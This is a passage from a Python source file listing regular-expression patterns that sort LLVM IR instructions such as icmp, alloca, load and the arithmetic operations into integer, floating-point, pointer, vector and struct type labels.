['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID> .*', 'struct operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID>\* .*', 'struct* operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID>\*\* .*', 'struct** operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID>\*\*\* .*', 'struct*** operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i24 .*', 'i24 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i24> .*', '<d x i24> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i40 .*', 'i40 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i40\* .*', 'i40* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?float\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?double\* .*', 'double* operation', 'floating point* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i1\*\* .*', 'i1** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i2\*\* .*', 'i2** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i4\*\* .*', 'i4** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i8\*\* .*', 'i8** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i16\*\* .*', 'i16** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i32\*\* .*', 'i32** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i40\*\* .*', 'i40** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i64\*\* .*', 'i64** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i128\*\* .*', 'i128** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?x86_fp80\*\* .*', 'float** operation', 'floating point** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?float\*\* .*', 'float** operation', 'floating point** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?double\*\* .*', 'double** operation', 'floating point** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID>\* .*', 'struct/class op', 'struct/class op'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?(%"|opaque).*', 'struct/class op', 'struct/class op'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?void \(.*', 'function op', 'struct/class op'],
['<%ID> = srem i1 .*', 'i1 operation', 'int operation'],
['<%ID> = srem <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = srem i2 .*', 'i2 operation', 'int operation'],
['<%ID> = srem <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = srem i4 .*', 'i4 operation', 'int operation'],
['<%ID> = srem <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = srem i8 .*', 'i8 operation', 'int operation'],
['<%ID> = srem <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = srem i16 .*', 'i16 operation', 'int operation'],
['<%ID> = srem <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = srem i32 .*', 'i32 operation', 'int operation'],
['<%ID> = srem <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = srem i64 .*', 'i64 operation', 'int operation'],
['<%ID> = srem <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = srem i128 .*', 'i128 operation', 'int operation'],
['<%ID> = srem <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = urem i1 .*', 'i1 operation', 'int operation'],
['<%ID> = urem <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = urem i2 .*', 'i2 operation', 'int operation'],
['<%ID> = urem <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = urem i4 .*', 'i4 operation', 'int operation'],
['<%ID> = urem <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = urem i8 .*', 'i8 operation', 'int operation'],
['<%ID> = urem <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = urem i16 .*', 'i16 operation', 'int operation'],
['<%ID> = urem <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = urem i32 .*', 'i32 operation', 'int operation'],
['<%ID> = urem <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = urem i64 .*', 'i32 operation', 'int operation'],
['<%ID> = urem <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = urem i128 .*', 'i128 operation', 'int operation'],
['<%ID> = urem <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = atomicrmw add i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = atomicrmw add i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = atomicrmw add i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = atomicrmw add i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = atomicrmw add i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = atomicrmw add i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = atomicrmw add i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = atomicrmw add i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = atomicrmw sub i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = atomicrmw sub i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = atomicrmw sub i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = atomicrmw sub i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = atomicrmw sub i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = atomicrmw sub i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = atomicrmw sub i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = atomicrmw sub i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = atomicrmw or i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = atomicrmw or i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = atomicrmw or i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = atomicrmw or i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = atomicrmw or i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = atomicrmw or i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = atomicrmw or i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = atomicrmw or i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = alloca i1($|,).*', 'i1 operation', 'int operation'],
['<%ID> = alloca i2($|,).*', 'i2 operation', 'int operation'],
['<%ID> = alloca i4($|,).*', 'i4 operation', 'int operation'],
['<%ID> = alloca i8($|,).*', 'i8 operation', 'int operation'],
['<%ID> = alloca i16($|,).*', 'i16 operation', 'int operation'],
['<%ID> = alloca i32($|,).*', 'i32 operation', 'int operation'],
['<%ID> = alloca i64($|,).*', 'i64 operation', 'int operation'],
['<%ID> = alloca i128($|,).*', 'i128 operation', 'int operation'],
['<%ID> = alloca i1\*($|,).*', 'i1* operation', 'int* operation'],
['<%ID> = alloca i2\*($|,).*', 'i2* operation', 'int* operation'],
['<%ID> = alloca i4\*($|,).*', 'i4* operation', 'int* operation'],
['<%ID> = alloca i8\*($|,).*', 'i8* operation', 'int* operation'],
['<%ID> = alloca i16\*($|,).*', 'i16* operation', 'int* operation'],
['<%ID> = alloca i32\*($|,).*', 'i32* operation', 'int* operation'],
['<%ID> = alloca i64\*($|,).*', 'i64* operation', 'int* operation'],
['<%ID> = alloca i128\*($|,).*', 'i128* operation', 'int* operation'],
['<%ID> = alloca x86_fp80($|,).*', 'float operation', 'floating point operation'],
['<%ID> = alloca float($|,).*', 'float operation', 'floating point operation'],
['<%ID> = alloca double($|,).*', 'double operation', 'floating point operation'],
['<%ID> = alloca x86_fp80\*($|,).*', 'float* operation', 'floating point* operation'],
['<%ID> = alloca float\*($|,).*', 'float* operation', 'floating point* operation'],
['<%ID> = alloca double\*($|,).*', 'double* operation', 'floating point* operation'],
['<%ID> = alloca %".*', 'struct/class op', 'struct/class op'],
['<%ID> = alloca <%.*', 'struct/class op', 'struct/class op'],
['<%ID> = alloca <?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = alloca opaque.*', 'struct/class op', 'struct/class op'],
['<%ID> = alloca <\d+ x i1>, .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i2>, .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i4>, .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i8>, .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i16>, .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i32>, .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i64>, .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i128>, .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x x86_fp80>, .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = alloca <\d+ x float>, .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = alloca <\d+ x double>, .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = alloca <\d+ x \{ .* \}>, .*', '<d x structure> operation', '<d x structure> operation'],
['<%ID> = alloca <\d+ x i1>\*, .*', '<d x i1>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i2>\*, .*', '<d x i2>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i4>\*, .*', '<d x i4>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i8>\*, .*', '<d x i8>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i16>\*, .*', '<d x i16>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i32>\*, .*', '<d x i32>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i64>\*, .*', '<d x i64>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i128>\*, .*', '<d x i128>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x x86_fp80>\*, .*', '<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = alloca <\d+ x float>\*, .*', '<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = alloca <\d+ x double>\*, .*', '<d x double>* operation', '<d x floating point>* operation'],
['<%ID> = alloca <\d+ x \{ .* \}>\*, .*', '<d x structure>* operation', '<d x structure>* operation'],
['<%ID> = alloca \[\d+ x i1\], .*', '[d x i1] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i2\], .*', '[d x i2] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i4\], .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i8\], .*', '[d x i8] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i16\], .*', '[d x i16] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i32\], .*', '[d x i32] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i64\], .*', '[d x i64] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i128\], .*', '[d x i128] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x x86_fp80\], .*', '[d x float] operation', '[d x floating point] operation'],
['<%ID> = alloca \[\d+ x float\], .*', '[d x float] operation', '[d x floating point] operation'],
['<%ID> = alloca \[\d+ x double\], .*', '[d x double] operation', '[d x floating point] operation'],
['<%ID> = alloca \[\d+ x \{ .* \}\], .*', '[d x structure] operation', '[d x structure] operation'],
['<%ID> = alloca { { float, float } }, .*', '{ float, float } operation', 'complex operation'],
['<%ID> = alloca { { double, double } }, .*', '{ double, double } operation', 'complex operation'],
['<%ID> = load ' + any_of(opt_load) + '?i1, .*', 'i1 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i2, .*', 'i2 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i4, .*', 'i4 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i8, .*', 'i8 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i16, .*', 'i16 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i24, .*', 'i16 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i32, .*', 'i32 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i40, .*', 'i40 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i64, .*', 'i64 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i128, .*', 'i128 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i256, .*', 'i256 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i1\*, .*', 'i1* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i2\*, .*', 'i2* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i4\*, .*', 'i4* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i8\*, .*', 'i8* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i16\*, .*', 'i16* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i24\*, .*', 'i16* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i32\*, .*', 'i32* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i40\*, .*', 'i40* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i64\*, .*', 'i64* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i128\*, .*', 'i128* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i256\*, .*', 'i256* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i1\*\*, .*', 'i1** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i2\*\*, .*', 'i2** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i4\*\*, .*', 'i4** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i8\*\*, .*', 'i8** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i16\*\*, .*', 'i16** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i24\*\*, .*', 'i16** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i32\*\*, .*', 'i32** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i40\*\*, .*', 'i40** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i64\*\*, .*', 'i64** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i128\*\*, .*', 'i128** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i256\*\*, .*', 'i256** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i1\*\*\*, .*', 'i1*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i2\*\*\*, .*', 'i2*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i4\*\*\*, .*', 'i4*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i8\*\*\*, .*', 'i8*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i16\*\*\*, .*', 'i16*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i24\*\*\*, .*', 'i16*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i32\*\*\*, .*', 'i32*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i40\*\*\*, .*', 'i40*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i64\*\*\*, .*', 'i64*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i128\*\*\*, .*', 'i128*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i256\*\*\*, .*', 'i256*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?x86_fp80, .*', 'float operation', 'floating point operation'],
['<%ID> = load ' + any_of(opt_load) + '?float, .*', 'float operation', 'floating point operation'],
['<%ID> = load ' + any_of(opt_load) + '?double, .*', 'double operation', 'floating point operation'],
['<%ID> = load ' + any_of(opt_load) + '?x86_fp80\*, .*', 'float* operation', 'floating point* operation'],
['<%ID> = load ' + any_of(opt_load) + '?float\*, .*', 'float* operation', 'floating point* operation'],
['<%ID> = load ' + any_of(opt_load) + '?double\*, .*', 'double* operation', 'floating point* operation'],
['<%ID> = load ' + any_of(opt_load) + '?x86_fp80\*\*, .*', 'float** operation', 'floating point** operation'],
['<%ID> = load ' + any_of(opt_load) + '?float\*\*, .*', 'float** operation', 'floating point** operation'],
['<%ID> = load ' + any_of(opt_load) + '?double\*\*, .*', 'double** operation', 'floating point** operation'],
['<%ID> = load ' + any_of(opt_load) + '?x86_fp80\*\*\*, .*', 'float*** operation', 'floating point*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?float\*\*\*, .*', 'float*** operation', 'floating point*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?double\*\*\*, .*', 'double*** operation', 'floating point*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?%".*', 'struct/class op', 'struct/class op'],
['<%ID> = load ' + any_of(opt_load) + '?<%.*', 'struct/class op', 'struct/class op'],
['<%ID> = load ' + any_of(opt_load) + '?<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = load ' + any_of(opt_load) + '?opaque.*', 'struct/class op', 'struct/class op'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i1>, .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i2>, .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i4>, .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i8>, .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i16>, .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i24>, .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i32>, .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i40>, .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i64>, .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i128>, .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x x86_fp80>, .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x float>, .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x double>, .*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x \{ .* \}>, .*', '<d x structure> operation',
'<d x structure> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i1\*>, .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i2\*>, .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i4\*>, .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i8\*>, .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i16\*>, .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i24\*>, .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i32\*>, .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i40\*>, .*', '<d x i40*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i64\*>, .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i128\*>, .*', '<d x i128*> operation', '<d x int*> operation'],
